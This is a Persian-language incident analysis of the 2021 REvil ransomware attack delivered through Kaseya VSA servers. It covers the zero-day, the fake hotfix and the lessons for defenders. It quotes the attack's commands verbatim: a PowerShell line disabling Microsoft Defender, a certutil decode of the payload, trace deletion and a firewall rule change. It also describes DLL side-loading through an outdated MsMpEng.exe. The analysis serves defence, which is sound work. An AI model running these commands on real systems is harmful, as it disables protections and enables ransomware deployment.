جمعه، 11 تیر ماه، منابع خبری از فلج شدن شرکتهای مختلف در نتیجه آلودگی به باجافزار REvil خبر دادند. همه این قربانیان در یک چیز مشترک بودند و آن استفاده مستقیم یا غیرمستقیم از سرورهای Kaseya VSA بود.
در این گزارش که با همکاری شرکت مهندسی شبکه گستر و مرکز مدیریت راهبردی افتای ریاست جمهوری تهیه گردیده روش اجرای این حمله مورد بررسی و تحلیل قرار گرفته است.
کاسیا (Kaseya, Ltd) شرکتی فعال در حوزه راهکارهای فناوری اطلاعات است که در 10 کشور جهان حضور مستقیم دارد. به گفته کاسیا بیش از 40 هزار مشتری، حداقل از یکی از محصولات این شرکت استفاده میکنند. VSA از جمله محصولات این شرکت برای مدیریت از راه دوره شبکهها و نقاط پایانی است. یکی از کاربردهای اصلی VSA فراهم کردن بستر برای مدیریت نقاط پایانی مشتریان شرکتهای ارائهدهنده خدمات پشتیبانی (Managed Service Provider – به اختصار MSP) است. این شرکتها میتوانند با استفاده از VSA سرورها و ایستگاههای کاری مشتریان خود را که نرمافزار Kaseya Agent بر روی آنها نصب شده است مدیریت کنند.
مدیر عامل کاسیا در روز جمعه، از اجرای یک حمله بالقوه بر ضد تعداد محدودی از مشتریان VSA خبر داد. همزمان آمار شناسایی REvil و بعضاً آلودگی دستگاهها به این باجافزار در بازهای یک ساعته بهشدت افزایش یافته بود.
کاسیا از مشتریان خود خواست برای احتیاط چه بیشتر فوراً نسبت به خاموش کردن سرورهای VSA خود اقدام کنند. اندکی بعد نیز این شرکت سرورهای رایانش ابری VSA و مرکز داده خود را از دسترس خارج کرد.
دو روز بعد، در 13 تیر ماه، کاسیا رسماً اعلام کرد که قربانی یک حمله پیچیده شده است.
برخی منابع گزارش کردهاند که حداقل 30 شرکت و به تبع آن بسیاری از مشتریان آنها از این حمله گسترده متأثر شدهاند.
بررسیهای بعدی نشان داد مهاجمان پس از سوءاستفاده از یک آسیبپذیری روز-صفر در VSA اقدام به توزیع کد مخرب بر روی دستگاههای متصل به این سرورها و آلوده کردن آنها به باجافزار REvil کرده بودند. شدت و دامنه این حمله به حدی بود که برخی شرکتهای امنیتی اقدام به انتشار هشدار و توصیهنامه امنیتی ویژه برای مشتریان خود کردند. برخی از این توصیهنامهها در لینکهای زیر قابل مطالعه است:
- https://kc.mcafee.com/corporate/index?page=content&id=KB94660
- https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack
REvil باجافزاری است که در قالب خدمات موسوم به RaaS به سایر مهاجمان فروخته میشود.
در خدمات “باجافزار بهعنوان سرویس” (Ransomware-as-a-Service) – به اختصار RaaS -، صاحب باجافزار، فایل مخرب را بهعنوان یک خدمت به متقاضی اجاره میدهد. متقاضی که ممکن است در برنامهنویسی تخصصی نداشته باشد تنها وظیفه انتشار باجافزار را بر عهده دارد. در نهایت بخشی از مبلغ اخاذی شده از قربانی به نویسنده باجافزار و بخشی دیگر به متقاضی سرویس میرسد.
طی یک سال گذشته پس از انهدام یا خروج خودخواسته گردانندگان RaaS و چندین باج افزار دیگر، REvil بیش از قبل مورد استقبال تبهکاران سایبری قرار گرفته است.
مهاجمان حمله اخیر در مطلبی مدعی شدهاند که بیش از یک میلیون دستگاه را به REvil آلوده کردهاند. همچنین اظهار داشتهاند که در صورت دریافت مبلغ 70 میلیون دلار، اقدام به انتشار یک ابزار رمزگشای مشترک خواهند کرد!
همانطور که اشاره شد مهاجمان از طریق یک آسیبپذیری روز-صفر در سرور VSA که بعداً به آن شناسه CVE-2021–30116 تخصیص داده شد موفق به اجرای این حمله گسترده شدهاند.
در آن حمله، مهاجمان پس از در اختیار گرفتن کنترل VSA، دسترسی راهبر به آن را قطع کردند. سپس با ایجاد یک فرمان بهروزرسانی جعلی با عنوان “Kaseya VSA Agent Hot-fix” فایل مخرب agent.crt را در مسیر پیشفرضی که بر اساس تنظیمات VSA تعیین میشود بر روی تمامی دستگاههای متصل کپی کردند.
نکته قابل توجه این که کاسیا در این مقاله فنی به مشتریان خود توصیه کرده که مسیرهای مورد استفاده توسط VSA از جمله مسیر مذکور را مستثنی کنند.
بنابراین فایل agent.crt بدون هیچگونه مزاحمتی از جانب برنامه امنیتی نصب شده بر روی دستگاه (به دلیل مستثنی شدن مسیر) ذخیره و اجرا میشود.
با اجرای فایل مذکور مجموعه فرامینی فراخوانی میشوند که در تصویر زیر نمایش داده شده است.
اما این فرامین چه میکنند؟
ping 127.0.0.1 -n 5693 > nul
این فرمان در حقیقت نقش یک تایمر را ایفا میکند. استفاده از پارامتر -n موجب میشود تا Ping.exe تعداد 5693 درخواست Echo را به دستگاهی که بر روی آن اجرا شده (Localhost) ارسال کند. به عبارت دیگر این فرمان را میتوان نوعی تابع “خواب” (Sleep Function) در نظر گرفت که برای 5693 ثانیه (تقریبا 94 دقیقه) اجرای فرمان بعدی را به تعویق میاندازد. به نظر میرسد فرایند انتخاب مقدار بهصورت تصادفی صورت گرفته و لزوماً در تمامی نمونهها، عدد 5693 نیست.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
در این مرحله با بکارگیری پروسه معتبر PowerShell تلاش میشود تا قابلیتهای مختلف ضدویروس پیشفرض سیستم عامل Windows یعنی Microsoft Defender غیرغعال شود. بدینترتیب ضدویروس مذکور در برابر هر گونه فایل مخرب بیاثر میشود.
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
این بخش از فرمان اقدام به ایجاد رونوشتی از فایل certutil.exe در پوشهای متفاوت از مسیر اصلی میکند. certutil.exe فایل معتبری است که در مسیر Windows\System32 قرار دارد. رونوشت، با نامی یکسان در مسیر زیر کپی می شود:
C:\Windows\cert.exe
echo %RANDOM% >> C:\Windows\cert.exe
فرمان بالا یک عدد 5 رقمی را به انتهای فایل cert.exe اضافه میکند. احتمالاً با این هدف که با تغییر امضای فایل، آن دسته از محصولات امنیتی را که سوءاستفاده از cert.exe را رصد و کنترل میکنند، دور بزند.
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
این بخش از فرمان فایل مخرب agent.cert را توسط cert.exe کدگشایی کرده و در قالب فایل agent.exe در مسیر c:\kworking ذخیره میکند.
در این فرایند از یک گواهینامه سرقت یا جعل شده با عنوان PB03 TRANSPORT LTD استفاده میشود.
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
این فرمان موجب حذف agent.crt و نسخه کپی شده cert.exe میشود.
c:\kworking\agent.exe
در نهایت agent.exe توسط Agentmon.exe که یکی از فایلهای معتبر VSA است، با سطح دسترسی System اجرا شده و عملیات باجافزار آغاز میشود.
در این مرحله agent.exe فایل MsMpEng.exe را کپی میکند. MsMpEng.exe یک فایل اجرایی مربوط به نسخه قدیمی (4.5.218.0) از نرمافزار Windows Defender است. مایکروسافت این نسخه را مدتها پیش منقضی کرده بود.
این نسخه از MsMpEng.exe به حملات موسوم به Side-loading آسیبپذیر است و قبلاً نیز در مواردی مورد بهرهجویی مهاجمان قرار گرفته بود. در این حمله نیز با سوءاستفاده از آسیبپذیری مذکور، agent.exe یک فایل مخرب با نام mpsvc.dll را در کنار MsMpEng.exe ایجاد میکند. در ادامه agent.exe اقدام به اجرای MsMpEng.exe و در نتیجه فراخوانی غیرمستقیم فایل مخرب mpsvc.dll در حافظه متعلق به MsMpEng.exe میکند.
mpsvc.dll نیز حاوی گواهینامه PB03 TRANSPORT LTD است که به agent.exe هم اعمال شده بود.
از این لحظه، کد مخرب mpsvc.dll فرایند عادی پروسه MsMpEng.exe را در اختیار میگیرد.
بهمحض آن که dll در حافظه فراخوانی میشود بدافزار آن را از روی دیسک حذف میکند.
اکنون MsMpEng.exe که در تسخیر کامل mpsvc.dll است رمزگذاری فایلهای ذخیره شده بر روی دیسک سخت، حافظههای جداشدنی و درایوهای شبکهای را آغاز میکند. با توجه به معتبر بودن MsMpEng.exe عملاً محصولات امنیتی آن را پروسهای مجاز تلقی کرده و مانع از اجرای این امور نمیشوند.
با اجرای فرمان زیر هم قابلیت Network Discovery در تنظیمات فایروال مجاز میشود:
netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes
فرایند رمزگذاری REvil با الگوریتم in-place صورت میپذیرد. در این الگوریتم، فایلهای رمزگذاری شده در همان سکتورهایی ذخیره میشوند که فایلهای اصلی (غیررمزشده) در آنجا بودهاند. لذا بازگردانی آنها از طریق ابزارهای بازیابی داده غیرممکن میشود.
در نهایت نیز تصویر پسزمینه دستگاه بهصورت زیر در میآید.
حمله به VSA را میتوان یکی از موفق ترین حملات موسوم به زنجیره تأمین (Supply Chain Attack) دانست. حملهای که در آن مهاجمان با سوءاستفاده از یک نرم افزار معتبر نصب شده بر روی دستگاه، بهسرعت و بهسادگی و بدون هیچگونه مزاحمتی از جانب برنامههای امنیتی آنها را به باجافزار آلوده کردند.
نشانه های آلودگی این حمله در مسیر زیر قابل دسترس است:
موارد زیر از جمله درسهایی است که میتوان از این حمله گسترده آموخت:
- هر گونه مستثنیسازی مسیر میتواند دستگاه را در معرض تهدید قرار دهد.
- آسیبپذیری هر گونه نرمافزارهای استفاده شده در زنجیره تأمین میتواند خسارات جبرانناپذیری را متوجه سازمان کند.
به یاد داشته باشیم که اتکای صرف به محصولات امنیتی نمیتواند سازمان را از گزند تمامی تهدیدات از جمله حملات هدفمند سایبری حفظ کند.
منابع:
- https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689
- https://nakedsecurity.sophos.com/2021/07/05/kaseya-ransomware-attackers-say-pay-70-million-and-well-set-everyone-free/
- https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- https://www.zdnet.com/article/kaseya-ransomware-supply-chain-attack-what-you-need-to-know/
- https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b